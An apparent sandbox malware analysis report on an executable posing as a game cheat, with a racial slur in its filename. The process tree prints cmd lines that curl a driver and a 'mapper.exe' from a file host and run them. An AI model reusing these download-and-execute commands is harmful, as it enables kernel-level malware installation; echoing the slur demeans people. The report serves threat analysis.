hxxps://cdn[.]discordapp[.]com/attachments/1267570042472501310/1270823255174942720/nigger_cheat[.]exe?ex=66b865a2&is=66b71422&hm=85c6b2988a07834630dfb0c1c28a8d38b3d07e9d9f522a9238418532af11a60a&

Analysis

max time kernel
116s
max time network
120s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
10/08/2024, 16:13

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://cdn.discordapp.com/attachments/1267570042472501310/1270823255174942720/nigger_cheat.exe?ex=66b865a2&is=66b71422&hm=85c6b2988a07834630dfb0c1c28a8d38b3d07e9d9f522a9238418532af11a60a&

Score

8^/10

discovery

Malware Config

Signatures

Downloads MZ/PE file

Executes dropped EXE 4 IoCs

pid	Process
920	nigger cheat.exe
3120	nigger cheat.exe
3096	nigger cheat.exe
2604	nigger cheat.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133677800342636921"	chrome.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings	chrome.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
4772	chrome.exe
4772	chrome.exe
3120	nigger cheat.exe
3120	nigger cheat.exe
3096	nigger cheat.exe
3096	nigger cheat.exe
2604	nigger cheat.exe
2604	nigger cheat.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs

pid	Process
4772	chrome.exe
4772	chrome.exe
4772	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	4772	chrome.exe
Token: SeCreatePagefilePrivilege	4772	chrome.exe
Token: SeShutdownPrivilege	4772	chrome.exe
Token: SeCreatePagefilePrivilege	4772	chrome.exe
Token: SeShutdownPrivilege	4772	chrome.exe
Token: SeCreatePagefilePrivilege	4772	chrome.exe
Token: SeShutdownPrivilege	4772	chrome.exe
Token: SeCreatePagefilePrivilege	4772	chrome.exe
Token: SeShutdownPrivilege	4772	chrome.exe
Token: SeCreatePagefilePrivilege	4772	chrome.exe
Token: SeShutdownPrivilege	4772	chrome.exe
Token: SeCreatePagefilePrivilege	4772	chrome.exe
Token: SeShutdownPrivilege	4772	chrome.exe
Token: SeCreatePagefilePrivilege	4772	chrome.exe
Token: SeShutdownPrivilege	4772	chrome.exe
Token: SeCreatePagefilePrivilege	4772	chrome.exe
Token: SeShutdownPrivilege	4772	chrome.exe
Token: SeCreatePagefilePrivilege	4772	chrome.exe
Token: SeShutdownPrivilege	4772	chrome.exe
Token: SeCreatePagefilePrivilege	4772	chrome.exe
Token: SeShutdownPrivilege	4772	chrome.exe
Token: SeCreatePagefilePrivilege	4772	chrome.exe
Token: SeShutdownPrivilege	4772	chrome.exe
Token: SeCreatePagefilePrivilege	4772	chrome.exe
Token: SeShutdownPrivilege	4772	chrome.exe
Token: SeCreatePagefilePrivilege	4772	chrome.exe
Token: SeShutdownPrivilege	4772	chrome.exe
Token: SeCreatePagefilePrivilege	4772	chrome.exe
Token: SeShutdownPrivilege	4772	chrome.exe
Token: SeCreatePagefilePrivilege	4772	chrome.exe
Token: SeShutdownPrivilege	4772	chrome.exe
Token: SeCreatePagefilePrivilege	4772	chrome.exe
Token: SeShutdownPrivilege	4772	chrome.exe
Token: SeCreatePagefilePrivilege	4772	chrome.exe
Token: SeShutdownPrivilege	4772	chrome.exe
Token: SeCreatePagefilePrivilege	4772	chrome.exe
Token: SeShutdownPrivilege	4772	chrome.exe
Token: SeCreatePagefilePrivilege	4772	chrome.exe
Token: SeShutdownPrivilege	4772	chrome.exe
Token: SeCreatePagefilePrivilege	4772	chrome.exe
Token: SeShutdownPrivilege	4772	chrome.exe
Token: SeCreatePagefilePrivilege	4772	chrome.exe
Token: SeShutdownPrivilege	4772	chrome.exe
Token: SeCreatePagefilePrivilege	4772	chrome.exe
Token: SeShutdownPrivilege	4772	chrome.exe
Token: SeCreatePagefilePrivilege	4772	chrome.exe
Token: SeShutdownPrivilege	4772	chrome.exe
Token: SeCreatePagefilePrivilege	4772	chrome.exe
Token: SeShutdownPrivilege	4772	chrome.exe
Token: SeCreatePagefilePrivilege	4772	chrome.exe
Token: SeShutdownPrivilege	4772	chrome.exe
Token: SeCreatePagefilePrivilege	4772	chrome.exe
Token: SeShutdownPrivilege	4772	chrome.exe
Token: SeCreatePagefilePrivilege	4772	chrome.exe
Token: SeShutdownPrivilege	4772	chrome.exe
Token: SeCreatePagefilePrivilege	4772	chrome.exe
Token: SeShutdownPrivilege	4772	chrome.exe
Token: SeCreatePagefilePrivilege	4772	chrome.exe
Token: SeShutdownPrivilege	4772	chrome.exe
Token: SeCreatePagefilePrivilege	4772	chrome.exe
Token: SeShutdownPrivilege	4772	chrome.exe
Token: SeCreatePagefilePrivilege	4772	chrome.exe
Token: SeShutdownPrivilege	4772	chrome.exe
Token: SeCreatePagefilePrivilege	4772	chrome.exe

Suspicious use of FindShellTrayWindow 44 IoCs

pid	Process
4772	chrome.exe
4772	chrome.exe
4772	chrome.exe
4772	chrome.exe
4772	chrome.exe
4772	chrome.exe
4772	chrome.exe
4772	chrome.exe
4772	chrome.exe
4772	chrome.exe
4772	chrome.exe
4772	chrome.exe
4772	chrome.exe
4772	chrome.exe
4772	chrome.exe
4772	chrome.exe
4772	chrome.exe
4772	chrome.exe
4772	chrome.exe
4772	chrome.exe
4772	chrome.exe
4772	chrome.exe
4772	chrome.exe
4772	chrome.exe
4772	chrome.exe
4772	chrome.exe
4772	chrome.exe
4772	chrome.exe
4772	chrome.exe
4772	chrome.exe
4772	chrome.exe
4772	chrome.exe
4772	chrome.exe
4772	chrome.exe
4772	chrome.exe
4772	chrome.exe
4772	chrome.exe
4772	chrome.exe
4772	chrome.exe
4772	chrome.exe
4772	chrome.exe
4772	chrome.exe
4772	chrome.exe
4772	chrome.exe

Suspicious use of SendNotifyMessage 32 IoCs

pid	Process
4772	chrome.exe
4772	chrome.exe
4772	chrome.exe
4772	chrome.exe
4772	chrome.exe
4772	chrome.exe
4772	chrome.exe
4772	chrome.exe
4772	chrome.exe
4772	chrome.exe
4772	chrome.exe
4772	chrome.exe
4772	chrome.exe
4772	chrome.exe
4772	chrome.exe
4772	chrome.exe
4772	chrome.exe
4772	chrome.exe
4772	chrome.exe
4772	chrome.exe
4772	chrome.exe
4772	chrome.exe
4772	chrome.exe
4772	chrome.exe
4772	chrome.exe
4772	chrome.exe
4772	chrome.exe
4772	chrome.exe
4772	chrome.exe
4772	chrome.exe
4772	chrome.exe
4772	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4772 wrote to memory of 992	4772	chrome.exe	74
PID 4772 wrote to memory of 992	4772	chrome.exe	74
PID 4772 wrote to memory of 4592	4772	chrome.exe	76
PID 4772 wrote to memory of 4592	4772	chrome.exe	76
PID 4772 wrote to memory of 4592	4772	chrome.exe	76
PID 4772 wrote to memory of 4592	4772	chrome.exe	76
PID 4772 wrote to memory of 4592	4772	chrome.exe	76
PID 4772 wrote to memory of 4592	4772	chrome.exe	76
PID 4772 wrote to memory of 4592	4772	chrome.exe	76
PID 4772 wrote to memory of 4592	4772	chrome.exe	76
PID 4772 wrote to memory of 4592	4772	chrome.exe	76
PID 4772 wrote to memory of 4592	4772	chrome.exe	76
PID 4772 wrote to memory of 4592	4772	chrome.exe	76
PID 4772 wrote to memory of 4592	4772	chrome.exe	76
PID 4772 wrote to memory of 4592	4772	chrome.exe	76
PID 4772 wrote to memory of 4592	4772	chrome.exe	76
PID 4772 wrote to memory of 4592	4772	chrome.exe	76
PID 4772 wrote to memory of 4592	4772	chrome.exe	76
PID 4772 wrote to memory of 4592	4772	chrome.exe	76
PID 4772 wrote to memory of 4592	4772	chrome.exe	76
PID 4772 wrote to memory of 4592	4772	chrome.exe	76
PID 4772 wrote to memory of 4592	4772	chrome.exe	76
PID 4772 wrote to memory of 4592	4772	chrome.exe	76
PID 4772 wrote to memory of 4592	4772	chrome.exe	76
PID 4772 wrote to memory of 4592	4772	chrome.exe	76
PID 4772 wrote to memory of 4592	4772	chrome.exe	76
PID 4772 wrote to memory of 4592	4772	chrome.exe	76
PID 4772 wrote to memory of 4592	4772	chrome.exe	76
PID 4772 wrote to memory of 4592	4772	chrome.exe	76
PID 4772 wrote to memory of 4592	4772	chrome.exe	76
PID 4772 wrote to memory of 4592	4772	chrome.exe	76
PID 4772 wrote to memory of 4592	4772	chrome.exe	76
PID 4772 wrote to memory of 4592	4772	chrome.exe	76
PID 4772 wrote to memory of 4592	4772	chrome.exe	76
PID 4772 wrote to memory of 4592	4772	chrome.exe	76
PID 4772 wrote to memory of 4592	4772	chrome.exe	76
PID 4772 wrote to memory of 4592	4772	chrome.exe	76
PID 4772 wrote to memory of 4592	4772	chrome.exe	76
PID 4772 wrote to memory of 4592	4772	chrome.exe	76
PID 4772 wrote to memory of 4592	4772	chrome.exe	76
PID 4772 wrote to memory of 3708	4772	chrome.exe	77
PID 4772 wrote to memory of 3708	4772	chrome.exe	77
PID 4772 wrote to memory of 4560	4772	chrome.exe	78
PID 4772 wrote to memory of 4560	4772	chrome.exe	78
PID 4772 wrote to memory of 4560	4772	chrome.exe	78
PID 4772 wrote to memory of 4560	4772	chrome.exe	78
PID 4772 wrote to memory of 4560	4772	chrome.exe	78
PID 4772 wrote to memory of 4560	4772	chrome.exe	78
PID 4772 wrote to memory of 4560	4772	chrome.exe	78
PID 4772 wrote to memory of 4560	4772	chrome.exe	78
PID 4772 wrote to memory of 4560	4772	chrome.exe	78
PID 4772 wrote to memory of 4560	4772	chrome.exe	78
PID 4772 wrote to memory of 4560	4772	chrome.exe	78
PID 4772 wrote to memory of 4560	4772	chrome.exe	78
PID 4772 wrote to memory of 4560	4772	chrome.exe	78
PID 4772 wrote to memory of 4560	4772	chrome.exe	78
PID 4772 wrote to memory of 4560	4772	chrome.exe	78
PID 4772 wrote to memory of 4560	4772	chrome.exe	78
PID 4772 wrote to memory of 4560	4772	chrome.exe	78
PID 4772 wrote to memory of 4560	4772	chrome.exe	78
PID 4772 wrote to memory of 4560	4772	chrome.exe	78
PID 4772 wrote to memory of 4560	4772	chrome.exe	78
PID 4772 wrote to memory of 4560	4772	chrome.exe	78
PID 4772 wrote to memory of 4560	4772	chrome.exe	78

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://cdn.discordapp.com/attachments/1267570042472501310/1270823255174942720/nigger_cheat.exe?ex=66b865a2&is=66b71422&hm=85c6b2988a07834630dfb0c1c28a8d38b3d07e9d9f522a9238418532af11a60a&
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4772
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffc87b29758,0x7ffc87b29768,0x7ffc87b29778
  2⤵
  PID:992
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1520 --field-trial-handle=1920,i,1351630356088503413,12783629326863475900,131072 /prefetch:2
  2⤵
  PID:4592
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1784 --field-trial-handle=1920,i,1351630356088503413,12783629326863475900,131072 /prefetch:8
  2⤵
  PID:3708
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2068 --field-trial-handle=1920,i,1351630356088503413,12783629326863475900,131072 /prefetch:8
  2⤵
  PID:4560
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2844 --field-trial-handle=1920,i,1351630356088503413,12783629326863475900,131072 /prefetch:1
  2⤵
  PID:524
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2856 --field-trial-handle=1920,i,1351630356088503413,12783629326863475900,131072 /prefetch:1
  2⤵
  PID:1352
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5048 --field-trial-handle=1920,i,1351630356088503413,12783629326863475900,131072 /prefetch:8
  2⤵
  PID:4268
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5268 --field-trial-handle=1920,i,1351630356088503413,12783629326863475900,131072 /prefetch:8
  2⤵
  PID:4204
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5420 --field-trial-handle=1920,i,1351630356088503413,12783629326863475900,131072 /prefetch:8
  2⤵
  PID:60
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5412 --field-trial-handle=1920,i,1351630356088503413,12783629326863475900,131072 /prefetch:8
  2⤵
  PID:4404
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5128 --field-trial-handle=1920,i,1351630356088503413,12783629326863475900,131072 /prefetch:8
  2⤵
  PID:4504
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5264 --field-trial-handle=1920,i,1351630356088503413,12783629326863475900,131072 /prefetch:8
  2⤵
  PID:3088
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5232 --field-trial-handle=1920,i,1351630356088503413,12783629326863475900,131072 /prefetch:8
  2⤵
  PID:4864
- C:\Users\Admin\Downloads\nigger cheat.exe
  "C:\Users\Admin\Downloads\nigger cheat.exe"
  2⤵
  - Executes dropped EXE
  PID:920
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=5648 --field-trial-handle=1920,i,1351630356088503413,12783629326863475900,131072 /prefetch:1
  2⤵
  PID:4572
- C:\Users\Admin\Downloads\nigger cheat.exe
  "C:\Users\Admin\Downloads\nigger cheat.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID:3120
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:1880
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:3584
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c curl https://files.catbox.moe/b4vczt.sys --output C:\drvr.sys >nul 2>&1
    3⤵
    PID:812
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c curl https://files.catbox.moe/i7z05r.bin --output C:\mapper.exe >nul 2>&1
    3⤵
    PID:4508
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\mapper.exe C:\drvr.sys
    3⤵
    PID:2360
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:4268
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:2780
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3684 --field-trial-handle=1920,i,1351630356088503413,12783629326863475900,131072 /prefetch:8
  2⤵
  PID:404

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:4484

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4860

C:\Users\Admin\Downloads\nigger cheat.exe
"C:\Users\Admin\Downloads\nigger cheat.exe"
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3096
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:1916
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:2936
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:760

C:\Users\Admin\Downloads\nigger cheat.exe
"C:\Users\Admin\Downloads\nigger cheat.exe"
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2604
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:1016
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:2012
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl https://files.catbox.moe/b4vczt.sys --output C:\drvr.sys >nul 2>&1
  2⤵
  PID:516
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl https://files.catbox.moe/i7z05r.bin --output C:\mapper.exe >nul 2>&1
  2⤵
  PID:164
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\mapper.exe C:\drvr.sys
  2⤵
  PID:168
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:4084
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:5076

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
678B

MD5
cd2d4c04900d7339aab3e64bda010d57

SHA1
628a141cc67d9b711654993758d5ed39a0980deb

SHA256
61569078a9c305b6bd31824508ef43b78868a6dcc6e71f75e8a0fa73e00010a9

SHA512
2cc86e593eaa99c027720ec3cc9ea497416a719ad48699ac4363901beeb2d1ebd70428e676b979ebb21c500ebecf6fe6986f3abc6e011b2757ba7e36f64110f0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
fead3b6cd4c685db295bfac5921cc2b5

SHA1
e6616d58bec84645868743d31d9e3b58a73706f1

SHA256
02bcb8efd50ac4ef0e26122697dffc1323419150063ed2ff51f704ee90b19508

SHA512
d183c3d25972ca5a8419e760fe1c9fb71692f5716656fa0dd761d271311a6dd76fa15ffec64ecdf23daeb32cdb22fb374e104f39ea5ebfb7786ddbc8ed039d80

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
75cbd98a5349005786e376039177a469

SHA1
5f9a97d5169a2442dde44b2f2354ddf3869008e5

SHA256
5a033dfcbe5e2a415426222ff571a572a58200373b5914da5d65236a06ac9569

SHA512
1426949ad354f17506d975732702c2ee217a458e85c881bf801ca75010b45f4bdb78e421ae33c0853e52d62568b0291d34372d635ec30b45ef83556e9de804e8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
5KB

MD5
ea0c11f17b4f4867fd17844d5cfd72cf

SHA1
7be1f80f67703090e9970da373e9613939336ad3

SHA256
bbf0696247661277a749f94744fd57865b43098c2bf2ed19bca6243d2a8a88de

SHA512
8b13e843246b7f625e76127b462e872f36fe8348e4586526b97bd5ddb81a1e8e6d514fd20b6920873235042e6e46dd8e86ce67ea662c98d71fcf74946bd8c677

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
5KB

MD5
2a8a64d0bbe129add3d633f8673f7419

SHA1
c0a5ae22104d96730bb0c09a912315c1a87370a3

SHA256
ec7c10cb5805d04c9c3368c7e03f2953c9f05bc8587572ceb3ff17670943bd0b

SHA512
1c6766de2ee2fc1733a1d96ff39157e955ea0b7436700abc9326328bef489c19b1c4bcf059b7c4545710204f83cba35d42a5acfe5fb130e7dbdae3eb7fdeb593

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
136KB

MD5
cb43bf06b41a28a464780204c2f2fcb3

SHA1
e7a9cbeadf42ec89cc6f73075b625685856482e0

SHA256
36e834f057f8a8fc9669276973b5ce80456380d273715e2437af98ea8c107af9

SHA512
94aa51d2a33c17e3deecdb90eb34d2dabdd36956a1bd780c661c642c0a049fb7416eec757f86b4717b3c4cbae6e7c1dfd8b8cc9e8128fa4a2a135ba5292cf440

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
136KB

MD5
e5e71cd0b41c57a86bd23b82dce2cb39

SHA1
db359533cc4f1a0475437d371581174522b11ff6

SHA256
7ed4077878ae367b8e0112a9f3d93edb877987348212dba8948b68d70db4a71d

SHA512
35c405252605fdff319fa6ed3bd17060a54c8feeba36bc253d2a53cc269a51a24637352d14aa0bedcd70c03019e51e68ac4d3bcdf6f2bac36081ed766b14d590

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
136KB

MD5
9e07f18913d362b011f69597d3f6fea6

SHA1
ec08c2f188a527668e8d61303269b8c4010ee8bf

SHA256
bf6b8a3765d958d67740d2e532fce6833aefc1e6971fc7a329e73815ee3f2d5b

SHA512
1c5a82f15f596847977a441f027f0c0b62510998944030c496323be1aeca297cec7a6cc2ecc23aec6659ff28972eb1e8ef6ce47e44c0f40c3cbc5c0c7498a0a5

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

Filesize
112KB

MD5
15d45cc76e38553d06517da71ca90bbe

SHA1
1fb17dc0777e5bbf26b277d2c2dd99f45313841f

SHA256
9f40f597047f6e1b859ea18e1deb41ac8529d5f558e62eba2e4789c7b051f7e4

SHA512
e9c0aadff3feddffc566e174774566ac35aa3b89b6c27dade9cfb886de67ee5a2993a68d83c54b83a05d9e5d8c4629f90447d7805f4393524654aaa712249d77

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe58a004.TMP

Filesize
111KB

MD5
bea1d3ba485948356bad312f06f35a60

SHA1
ad4ff5aa5263a14d7b6adbfc49e117467561a339

SHA256
154f4185116ca3a3fa3ea165e3156c5d27319e319acf39bb8ff94b78c4584f37

SHA512
33eaba135d5961a3c3e7ffb55d1ed93bc7c8052bfd39d3ddb67fced1d8b83f811c7d1c1fe8e34db5147a6f6fbde1d635fc2b66374e0af4d98440abd846073718

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\data_1

Filesize
264KB

MD5
83162b5074ceddc54c11d21ed54ea536

SHA1
f22d99de8ea9a1cf7663cb9a074db47c41fa8261

SHA256
137256ccc986083c748121ed734bb0782d496b37de9e98c1ea804df573a05982

SHA512
b1edffd7821819df0aa7ba92e0828eefcbdf90e4ed5a58bc1edc436ddf0b28d26149bb793e922a0190290649b4f2b447b5dd756824eb159810fb1cfdcd1d8257

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json

Filesize
2B

MD5
99914b932bd37a50b983c5e7c90ae93b

SHA1
bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

SHA256
44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

SHA512
27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 292182.crdownload

Filesize
328KB

MD5
645c717aa9994a11652ac747da8f8f07

SHA1
40a5a662be7d348c31a830e091d7111bc5c25e70

SHA256
70e62ccafb2c478ebea22ab7e4d36a7745e544b01b4a3b8c06a997c2131301aa

SHA512
ce953662a603a160fbd68c807eb33af4b5fecde0d73abff655f8c96341c3826e005b2c96df79cecc64655b3e12d05da0807f511765b14de600acd5ea935f42c4

Download Submit